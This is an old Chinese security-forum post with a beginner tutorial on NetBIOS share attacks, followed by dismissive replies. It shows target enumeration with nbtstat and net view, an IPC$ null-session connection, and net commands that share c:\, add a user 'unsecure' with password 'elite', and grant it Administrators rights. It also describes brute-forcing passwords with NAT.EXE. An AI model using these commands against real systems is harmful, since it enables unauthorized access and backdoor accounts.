论坛: 菜鸟乐园 标题: 简单攻击简述 复制本贴地址    
作者: runwin [runwin]    论坛用户   登录
NetBIOS攻击 
首先看看使用微软的工具来攻击NetBIOS Shares: 
C:\>NBTSTAT -A 123.123.123.123 
C:\>NBTSTAT -a www.target.com 
输出如下: 
NetBIOS Remote Machine Name Table 

Name Type Status 
--------------------------------------------- 
STUDENT1 <20> UNIQUE Registered 
STUDENT1 <00> UNIQUE Registered 
DOMAIN1 <00> GROUP Registered 
DOMAIN1 <1C> GROUP Registered 
DOMAIN1 <1B> UNIQUE Registered 
STUDENT1 <03> UNIQUE Registered 
DOMAIN1 <1E> GROUP Registered 
DOMAIN1 <1D> UNIQUE Registered 
..__MSBROWSE__.<01> GROUP Registered 

MAC Address = 00-C0-4F-C4-8C-9D 
当NetBIOS发现以后就可以加入到lmhosts文件中了。 
Computername <03> UNIQUE Registered其中的这个computername在你想在网络邻居里看到这个计算机的时候必须要使用,加入到lmhosts文件中,但是如果使用NAT.EXE的话又不是必须的了。 

Lmhosts文件举例: 
123.123.123.123 student1 
24.3.9.12 target2 
(说明,通常在NT下这个lmhosts文件应该放在\winnt\system32\drivers\etc目录中,这个目录中有个lmhosts.sam示例文件,创建lmhosts文件以后,可以使用nbtstat �CR的命令重新载入这个文件的内容。) 

这时,你就可以用搜索选项来找到这个机器了。当然你也可以使用NET.EXE这个更强大方便的方法来实现。 

C:\>net view 123.123.123.123 
C:\>net view \\student1 

可能的输出为: 
Shared resources at 123.123.123.123 


Share name Type Used as Comment 

------------------------------------------------------------------------------ 
NETLOGON Disk Logon server share 
Test Disk 
The command completed successfully. 
注意:C$,ADMIN$,IPC$都是隐藏不会列出来的。 

建立一个IPC$的空连接使用下面的命令: 
C:\net use \\111.111.111.111\ipc$ "" /user:"" 
The command completed successfully. 

连接到一个普通的share使用下面的命令: 
C:\net use x: \\123.123.123.123\test 
The command completed successfully. 

记录新的网络连接使用下面的命令: 
C:\net use 
New connections will be remembered. 


Status Local Remote Network 

------------------------------------------------------------------------------- 
OK X: \\123.123.123.123\test Microsoft Windows Network 
OK \\123.123.123.123\test Microsoft Windows Network 
The command completed successfully. 

下面还要列出一些有趣的NET命令,可以用来做一些和NetBIOS协议无关的事情: 
NET localgroup <enter>列出本地主机所建立的组名 
NET name <enter>列出计算机名和已经login的用户名。 
NET accounts <enter>列出对于用户的password的策略。 
NET share <enter>列出本地主机所有的share包括隐含的share。 
NET share unsecure=c:\ 将把c:\共享,共享名为unsecure 
NET user <enter>显示本地主机创建的用户。 
NET user unsecure elite /add将添加一个名字为unsecure ,密码为elite的用户。 
NET start SERVICE例如使用NET start schedule启动这个服务以后可以用来完全访问register。 
NET group Administrators unsecure /add将添加一个用户unsecure到组Administrators中,只有在域控制器上才有效。 


NAT(NetBIOS Auditing Tool) 
NAT工作在缺省的share权限下也就是everyone full control。如果你被拒绝访问,那么就需要口令拉。 
NAT.EXE (NetBIOS Auditing Tool) 
NAT.EXE [-o filename] [-u userlist] [-p passlist] <address> 

Option解释: 
-o 结果输出文件。 
-u 包含用户名的文件。 
-p 包含口令的文件。 
Address 地址,可以是单个地址,也可以是地址群。 

(太长啦。。发不了全部)


地主 发表时间: 01/12 00:59
回复: vishx [vishx]   论坛用户   登录
你有完没完??还发这个

B1层 发表时间: 01/12 07:50
回复: 54183710 [hcz]   论坛用户   登录
这个有个屁用,只能看他的共想

B2层 发表时间: 01/12 09:17
回复: fanzed [fanzed]   论坛用户   登录
也不要这么说呀

B3层 发表时间: 04/03 11:51

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号